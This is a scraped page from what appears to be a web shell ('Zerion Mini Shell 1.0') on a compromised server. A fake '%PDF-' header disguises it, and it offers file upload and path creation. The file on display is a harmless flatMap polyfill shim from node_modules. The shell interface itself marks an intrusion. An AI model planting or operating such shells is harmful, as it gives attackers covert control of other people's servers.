%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/node_modules/array.prototype.flatmap/
Upload File :
Create Path :
Current File : /var/www/html/node_modules/array.prototype.flatmap/shim.js

'use strict';

var define = require('define-properties');
var getPolyfill = require('./polyfill');

module.exports = function shimFlatMap() {
	var polyfill = getPolyfill();
	define(
		Array.prototype,
		{ flatMap: polyfill },
		{ flatMap: function () { return Array.prototype.flatMap !== polyfill; } }
	);
	return polyfill;
};

Zerion Mini Shell 1.0